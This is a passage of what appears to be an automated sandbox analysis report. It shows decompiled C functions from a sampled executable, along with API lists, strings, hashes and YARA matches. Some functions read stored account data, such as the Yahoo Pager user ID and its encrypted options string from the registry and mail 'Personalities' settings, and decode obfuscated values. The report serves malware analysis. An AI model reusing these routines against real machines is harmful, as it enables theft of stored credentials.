						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                  0x0040329e
                                                  0x004032ac
                                                  0x004032b6
                                                  0x004032bd
                                                  0x004032c3
                                                  0x004032d3
                                                  0x004032da
                                                  0x004032da
                                                  0x004032ec
                                                  0x004032f2
                                                  0x0040330c
                                                  0x00403314
                                                  0x00403390
                                                  0x00000000
                                                  0x00403316
                                                  0x00403316
                                                  0x00403319
                                                  0x0040331c
                                                  0x0040331f
                                                  0x00403322
                                                  0x00403324
                                                  0x00403382
                                                  0x00403383
                                                  0x0040338a
                                                  0x0040338e
                                                  0x00000000
                                                  0x00000000
                                                  0x0040332c
                                                  0x00403332
                                                  0x0040334a
                                                  0x00403367
                                                  0x00403367
                                                  0x0040336c
                                                  0x0040336f
                                                  0x00403379
                                                  0x00000000
                                                  0x0040337b
                                                  0x0040337b
                                                  0x00000000
                                                  0x0040337b
                                                  0x00403379
                                                  0x00000000
                                                  0x00403382
                                                  0x00403314
                                                  0x00403394

                                                  APIs
                                                    • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                  • memset.MSVCRT ref: 004032F2
                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                  • strchr.MSVCRT ref: 00403341
                                                    • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                  • strlen.MSVCRT ref: 00403383
                                                    • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                  • String ID: Personalities
                                                  • API String ID: 2103853322-4287407858
                                                  • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                  • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                  • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                  • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410F79, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                  0x00410f79
                                                  0x00410f8a
                                                  0x00410f94
                                                  0x00410f9b
                                                  0x00410fb8
                                                  0x00410fd1
                                                  0x00411002
                                                  0x00411002
                                                  0x00411007
                                                  0x00411007
                                                  0x00411012

                                                  APIs
                                                  • memset.MSVCRT ref: 00410F9B
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValuememset
                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                  • API String ID: 1830152886-1703613266
                                                  • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                  • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                  • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                  • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F41, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405F41(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E46(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                  0x00405f4b
                                                  0x00405f4f
                                                  0x00405f57
                                                  0x00405f57
                                                  0x00405f60
                                                  0x00405f79
                                                  0x00405f9a

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMessagesprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 1670431679-1552265934
                                                  • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                  • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                  • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                  • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                  0x0040f03e
                                                  0x0040f046
                                                  0x0040f04e
                                                  0x0040f056
                                                  0x0040f063
                                                  0x0040f063
                                                  0x0040f066
                                                  0x0040f070

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,774148C0,00405C41,00000000), ref: 0040F040
                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 145871493-1506664499
                                                  • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                  • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                  • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                  • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                  0x00407412
                                                  0x00407415
                                                  0x0040741a
                                                  0x0040741c
                                                  0x00407422
                                                  0x00407428
                                                  0x00407428
                                                  0x00407428
                                                  0x00407429
                                                  0x0040754a
                                                  0x00407438
                                                  0x00407446
                                                  0x0040744d
                                                  0x00407455
                                                  0x00407459
                                                  0x00407461
                                                  0x00407467
                                                  0x0040749b
                                                  0x0040749b
                                                  0x004074a1
                                                  0x004074ad
                                                  0x004074b6
                                                  0x004074bf
                                                  0x004074d0
                                                  0x004074d7
                                                  0x004074e1
                                                  0x004074e3
                                                  0x004074ed
                                                  0x004074ef
                                                  0x004074ef
                                                  0x004074fc
                                                  0x00407503
                                                  0x0040750a
                                                  0x0040750f
                                                  0x00407512
                                                  0x00407518
                                                  0x00407520
                                                  0x00407530
                                                  0x00407535
                                                  0x00407535
                                                  0x004074e1
                                                  0x00000000
                                                  0x00407541
                                                  0x0040746e
                                                  0x00407471
                                                  0x00407472
                                                  0x00407484
                                                  0x00407486
                                                  0x0040748d
                                                  0x0040748e
                                                  0x00407491
                                                  0x00407491
                                                  0x00407492
                                                  0x00407492
                                                  0x00000000
                                                  0x00407472

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                  • String ID: &v@
                                                  • API String ID: 3110682361-3426253984
                                                  • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                  • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                  • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                  • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}








                                                  0x004096a7
                                                  0x004096ac
                                                  0x004096b3
                                                  0x004096b6
                                                  0x004096c4
                                                  0x004096cb
                                                  0x004096e7
                                                  0x004096f6
                                                  0x004096fc
                                                  0x00409710
                                                  0x0040971b
                                                  0x00409720
                                                  0x00409723
                                                  0x00409724
                                                  0x00409729
                                                  0x0040973b

                                                  APIs
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  • memset.MSVCRT ref: 004096CB
                                                    • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 00409710
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 3200591283-2769808009
                                                  • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                  • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                  • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                  • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407BF9, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406560(_t30);
				}
				return 1;
			}









                                                  0x00407c04
                                                  0x00407c07
                                                  0x00407c11
                                                  0x00407c18
                                                  0x00407c23
                                                  0x00407c33
                                                  0x00407c41
                                                  0x00407c49
                                                  0x00407c4f
                                                  0x00407c55
                                                  0x00407c5a
                                                  0x00407c5d
                                                  0x00407c62
                                                  0x00407c68

                                                  APIs
                                                  • GetParent.USER32(?), ref: 00407C0B
                                                  • GetWindowRect.USER32 ref: 00407C18
                                                  • GetClientRect.USER32 ref: 00407C23
                                                  • MapWindowPoints.USER32 ref: 00407C33
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                  • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                  • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                  • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}








                                                  0x0040a4c9
                                                  0x0040a4cb
                                                  0x0040a4d5
                                                  0x0040a4f5
                                                  0x0040a4f7
                                                  0x0040a504
                                                  0x0040a518
                                                  0x0040a522
                                                  0x0040a52f
                                                  0x0040a532
                                                  0x0040a53d
                                                  0x0040a54f
                                                  0x00000000
                                                  0x0040a569
                                                  0x0040a56b

                                                  APIs
                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                    • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                    • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                    • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                    • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                    • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                    • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                  • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                  • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                  • String ID:
                                                  • API String ID: 2210206837-0
                                                  • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                  • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                  • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                  • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}











                                                  0x00409881
                                                  0x00409883
                                                  0x0040988a
                                                  0x00409899
                                                  0x004098a0
                                                  0x004098ad
                                                  0x004098b9
                                                  0x004098bd
                                                  0x004098c3
                                                  0x004098d7
                                                  0x004098f1

                                                  APIs
                                                  • memset.MSVCRT ref: 0040988A
                                                  • memset.MSVCRT ref: 004098A0
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                    • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                    • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                  • sprintf.MSVCRT ref: 004098D7
                                                  Strings
                                                  • <%s>, xrefs: 004098D1
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3202206310-1998499579
                                                  • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                  • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                  • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                  • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                  0x00408572
                                                  0x00408572
                                                  0x0040857b
                                                  0x0040857d
                                                  0x0040857e
                                                  0x00408583
                                                  0x00408584
                                                  0x00408589
                                                  0x0040858b
                                                  0x0040858c
                                                  0x00408591
                                                  0x00408592
                                                  0x0040859a
                                                  0x0040859c
                                                  0x0040859d
                                                  0x004085a2
                                                  0x004085a3
                                                  0x004085ab
                                                  0x004085ad
                                                  0x004085b1
                                                  0x004085b3
                                                  0x004085b4
                                                  0x004085ba
                                                  0x004085ba
                                                  0x004085bc
                                                  0x004085bd
                                                  0x004085c2
                                                  0x004085c4
                                                  0x004085ca
                                                  0x004085cd
                                                  0x004085d0
                                                  0x004085d7

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                  • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                  • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                  • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                  0x004085d8
                                                  0x004085db
                                                  0x004085e1
                                                  0x004085e6
                                                  0x004085eb
                                                  0x004085ed
                                                  0x004085f2
                                                  0x004085f3
                                                  0x004085f8
                                                  0x004085f9
                                                  0x004085fe
